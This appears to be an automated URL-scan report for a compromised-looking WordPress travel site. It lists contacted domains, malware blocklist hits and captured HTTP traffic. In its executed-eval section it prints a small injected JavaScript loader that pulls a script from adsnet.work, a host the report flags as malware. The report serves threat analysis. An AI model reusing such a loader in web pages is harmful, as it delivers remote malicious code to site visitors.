Overview

URLhotelsweb.site/
IP 199.250.192.223 (United States)
ASN#54641 IMH-IAD
UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed2022-12-01 12:45:54 UTC
StatusLoading report..
IDS alerts0
Blocklist alert27
urlquery alerts No alerts detected
Tags None

Domain Summary (13)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.37.79.227
hotelsweb.site (5) 0 2020-02-02 06:48:20 UTC 2022-12-01 04:02:48 UTC 199.250.192.223 Unknown ranking
fonts.googleapis.com (1) 8877 2013-06-10 20:14:26 UTC 2022-12-01 04:19:36 UTC 142.250.74.106
adsnet.work (1) 0 2015-06-06 16:23:15 UTC 2022-11-28 16:54:42 UTC 193.3.19.36 Unknown ranking
ocsp.digicert.com (2) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-12-01 04:11:13 UTC 34.117.237.239
img-getpocket.cdn.mozilla.net (6) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
www.hotelsweb.site (66) 0 No data No data 199.250.192.223 Unknown ranking
fonts.gstatic.com (4) 0 2014-09-09 00:40:21 UTC 2022-12-01 04:14:51 UTC 216.58.207.227 Domain (gstatic.com) ranked at: 540
hydrahydra.kim (1) 0 2021-10-19 18:50:29 UTC 2022-11-28 16:54:43 UTC 193.3.19.36 Unknown ranking
r3.o.lencr.org (6) 344 No data No data 23.33.119.27
firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-12-01 04:09:38 UTC 34.102.187.140

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-12-01 2 hotelsweb.site/ Malware
2022-12-01 2 www.hotelsweb.site/ Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/themes/hotel (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/themes/railw (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/wp-travel-engine/public/css/wp-travel (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/themes/travel-agency/style.css?ver=1.1.6 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travel-agency-companion/public/js/tra (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/wp-travel-engine/public/js/wp-travel- (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/wp-travel-engine/public/js/wpte-galle (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/wp-emoji-release.min.js?ver=4.9.22 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/elementor/assets/lib/font-awesome/css (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travel-agency-companion/public/css/od (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/jquer (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/pikaday.js Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/date. (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/lib/pikad (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travelpayouts/app/public/js/site/TPPl (...) Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/themes/travel-agency/js/wow.min.js?ver=1.1.6 Malware
2022-12-01 2 www.hotelsweb.site/wp-includes/js/wp-embed.min.js?ver=4.9.22 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/themes/travel-agency/js/custom.min.js?ver=1.1.6 Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/elementor/assets/lib/font-awesome/fon (...) Malware
2022-12-01 2 adsnet.work/scripts/place.js Malware
2022-12-01 2 www.hotelsweb.site/wp-content/plugins/travel-agency-companion/public/js/owl (...) Malware

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 3 reports on IP: 199.250.192.223
Date UQ / IDS / BL URL IP
2022-12-01 12:45:54 +0000 0 - 0 - 27 hotelsweb.site/ 199.250.192.223
2022-09-04 15:29:18 +0000 0 - 0 - 20 hotelsale.online/ 199.250.192.223
2022-09-01 13:26:19 +0000 0 - 0 - 20 hotelsale.online/ 199.250.192.223


Last 5 reports on ASN: IMH-IAD
Date UQ / IDS / BL URL IP
2023-01-29 20:05:54 +0000 0 - 0 - 1 jasonmaymusic.com/torquesound.com.zip 199.250.197.1
2023-01-29 20:05:52 +0000 0 - 0 - 1 jasonmaymusic.com/jasonmaymusic_all.zip 199.250.197.1
2023-01-29 20:05:48 +0000 0 - 0 - 1 jasonmaymusic.com/jasonmaymusic_all.zip 199.250.197.1
2023-01-29 20:05:47 +0000 0 - 0 - 1 jasonmaymusic.com/torquesound.com.zip 199.250.197.1
2023-01-29 18:33:50 +0000 0 - 0 - 2 miondropind.com/ 168.235.116.72


Last 1 reports on domain: hotelsweb.site
Date UQ / IDS / BL URL IP
2022-12-01 12:45:54 +0000 0 - 0 - 27 hotelsweb.site/ 199.250.192.223


No other reports with similar screenshot

JavaScript

Executed Scripts (31)

Executed Evals (1)
#1 JavaScript::Eval (size: 193) - SHA256: 0f6705141dd378bf24f739c6ab012da37c2cc4b42357ae7f2e03ae25903eebce
var script = document.createElement('script');
script.onload = function() {};
script.src = "https://adsnet.work/scripts/place.js";
document.getElementsByTagName('head')[0].appendChild(script);

Executed Writes (0)


HTTP Transactions (97)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "8EED57C91B42EF7B2D5EFF1309E306E23E13C3DE21219AF24A693CBF3E8977FC"
Last-Modified: Mon, 28 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4956
Expires: Thu, 01 Dec 2022 14:08:19 GMT
Date: Thu, 01 Dec 2022 12:45:43 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4427
Cache-Control: 'max-age=158059'
Date: Thu, 01 Dec 2022 12:45:43 GMT
Last-Modified: Thu, 01 Dec 2022 11:31:56 GMT
Server: ECS (ska/F70E)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Retry-After, Alert, Backoff, Content-Length, Content-Type
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Thu, 01 Dec 2022 12:19:46 GMT
cache-control: public,max-age=3600
age: 1557
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    14cd9a0afb6ba9a763651d5112760d1e
Sha1:   75d7b104ab9ab11fbb73c3f348b43b0119b5adfa
Sha256: 4e32a117106be587ffcd63239c16a8117eb7840830d4c9decf6527761967532e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "F18AC558CB786126BB7EFB159E03353D268D5F5796BCFD2691A349DFC68D863C"
Last-Modified: Mon, 28 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6850
Expires: Thu, 01 Dec 2022 14:39:53 GMT
Date: Thu, 01 Dec 2022 12:45:43 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: eTvajpA3ZWEA8tgfrj3nks2Wc8gy10MmLlnMQRHQAg96AcP77inRGyQJJ3phMUIiTd03QbDHdd0=
x-amz-request-id: Y36S7XDSBJA91GJ4
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Thu, 01 Dec 2022 12:45:40 GMT
age: 3
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Thu, 01 Dec 2022 12:45:43 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Last-Modified, Retry-After, Cache-Control, Content-Type, Pragma, Backoff, ETag, Expires, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Thu, 01 Dec 2022 12:08:56 GMT
cache-control: public,max-age=3600
age: 2207
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4429
Cache-Control: max-age=164094
Date: Thu, 01 Dec 2022 12:45:44 GMT
Etag: "63886ea9-1d7"
Expires: Sat, 03 Dec 2022 10:20:38 GMT
Last-Modified: Thu, 01 Dec 2022 09:06:49 GMT
Server: ECS (ska/F70E)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: w4CYaFXbhvs34jOrfYiN4g==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         52.37.79.227
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: fn7ibkxylN/zHJQfnnuEKknxKC0=

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14904
Expires: Thu, 01 Dec 2022 16:54:09 GMT
Date: Thu, 01 Dec 2022 12:45:45 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14904
Expires: Thu, 01 Dec 2022 16:54:09 GMT
Date: Thu, 01 Dec 2022 12:45:45 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.33.119.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "D469C5ADB69F261084B016F8E24EDF8B69B62D9F930CA2D85CF35375E2303ECC"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14904
Expires: Thu, 01 Dec 2022 16:54:09 GMT
Date: Thu, 01 Dec 2022 12:45:45 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F881a33ae-e81b-4603-85d9-a2242b17be66.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4803
x-amzn-requestid: ad2d9243-5e32-4faf-8ff3-b9abd3af1e89
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cb1_hEJJIAMF4Vg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6387d063-596f5833509112ee6cbedf54;Sampled=0
x-amzn-remapped-date: Wed, 30 Nov 2022 21:51:31 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: jM-fTqLsmU3c_gc9Wle-lvCwXelA9Sid9axtzJQDsfOHv23yUbKsBw==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 943c6a4d4ee43b18ee91634536f53eae.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 22:43:35 GMT
age: 50530
etag: "cedf2f21be7cd366bd46055b62b5513db3011dfc"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4803
Md5:    cc0a257323f882caff067adb86d906e4
Sha1:   cedf2f21be7cd366bd46055b62b5513db3011dfc
Sha256: c16a9296d5e840a468fef7fb2764b9f7d4b3131d7ade2ce4999de1eead5469e0
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F966ff24e-ea85-4a2e-aead-22f1a723c59f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9674
x-amzn-requestid: 7e7d0183-9667-462a-8d44-d125998c1ae3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cYgEoHVAoAMFvAQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63867a1d-280ba97e3fe1bf7244cbde35;Sampled=0
x-amzn-remapped-date: Tue, 29 Nov 2022 21:31:09 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: ym_L3s5E6MLy6BxqNkVxok6L6hA4c-ilSsEqt42j2IbiXYPb4c6-VQ==
via: 1.1 26ca01ec7377e425b59b6a08cb1ec342.cloudfront.net (CloudFront), 1.1 6a9b42e38e76b7d4a4044ebe0e0eca08.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 21:52:57 GMT
age: 53568
etag: "53650399f9a986ba54addd668b4557109d12003b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9674
Md5:    5508d05a290b663fd89ead9b58f2efd8
Sha1:   53650399f9a986ba54addd668b4557109d12003b
Sha256: 65704a961410fdd318c491fedf002c8e9b184cd34b76fe1b67026d42ce21be3f
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F600016d1-5abb-4a6c-996a-933a8d4bc6df.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8740
x-amzn-requestid: c6c3e3dc-c9a2-4fda-a83b-cdd6ae81166b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cP7uyE9CoAMF6Xg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63830cc4-2c8940405044071a082ee678;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 07:07:48 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: qykE_oaoqqPTgqGnfUo74mH29IOS97b5sZb_3VmB9yW7KUiJ1a7dnA==
via: 1.1 1cc6ed0d2d3dd9529ce544f9dfe61a52.cloudfront.net (CloudFront), 1.1 61bc723adb3b1884ed759711e84e13a8.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 18:58:06 GMT
age: 64059
etag: "2e62f9ed8f5e7b2f888a73320dd98b0cda9303b8"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8740
Md5:    26d6dffbf400da4803a2e76e2a8ef2f8
Sha1:   2e62f9ed8f5e7b2f888a73320dd98b0cda9303b8
Sha256: 04c6e31623fe48cbe83dc91635bfa47b337590f18919995b08d5bde27e929e03
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb0e1339e-3c63-4033-8b5b-e21137509777.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 16038
x-amzn-requestid: 925134ee-dd35-45ed-8da7-d60c9c484993
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cbz80EHboAMFtmQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6387cd1e-48de287757e82632291365ee;Sampled=0
x-amzn-remapped-date: Wed, 30 Nov 2022 21:37:34 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: I8qQQUMSVzFmXqjWM1n_F1XEE-ZQcpEF81OwJgf9i3Q5M8XiFAa8Zg==
via: 1.1 a20e81b65d2465c729ce2f6bfe539dd0.cloudfront.net (CloudFront), 1.1 7e87179efaa9e3c316bd3d3a74cfded8.cloudfront.net (CloudFront), 1.1 google
date: Wed, 30 Nov 2022 21:52:00 GMT
age: 53625
etag: "5cf9a7a784952e1bb0cbe499104f1774b1269d08"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   16038
Md5:    ffd12f9c423ffc627d9e3b3145944fe4
Sha1:   5cf9a7a784952e1bb0cbe499104f1774b1269d08
Sha256: a25f1b752d9af599aefd73073c105853130f1759905269de3d582d2eb35fe167
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F051e025a-c892-4a7d-8a1d-95f6d77ebb3c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4762
x-amzn-requestid: 52b09ca3-705b-4c86-9f56-172637553f87
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cP7TVG58oAMFQTw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63830c15-4577a47243ad190672f8ac89;Sampled=0
x-amzn-remapped-date: Sun, 27 Nov 2022 07:04:53 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: Y0-NAp2LMMG5TjQQ9ENHwDyKXLObKTYqzPPOWvZhs7Y9WJIC6LoblQ==
via: 1.1 2dc111aa3ead15d061e41a423155a53a.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Thu, 01 Dec 2022 05:45:16 GMT
age: 25229
etag: "fa2217bae05b7beca2e12597eaad835298276b82"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4762
Md5:    d2dd5a4bcfd47db8f38544bf39ce3031
Sha1:   fa2217bae05b7beca2e12597eaad835298276b82
Sha256: 3266004f5e73af5359b71622eea31f1e28abb4bbc443b5f9e481b5a8b2e9249e
                                        
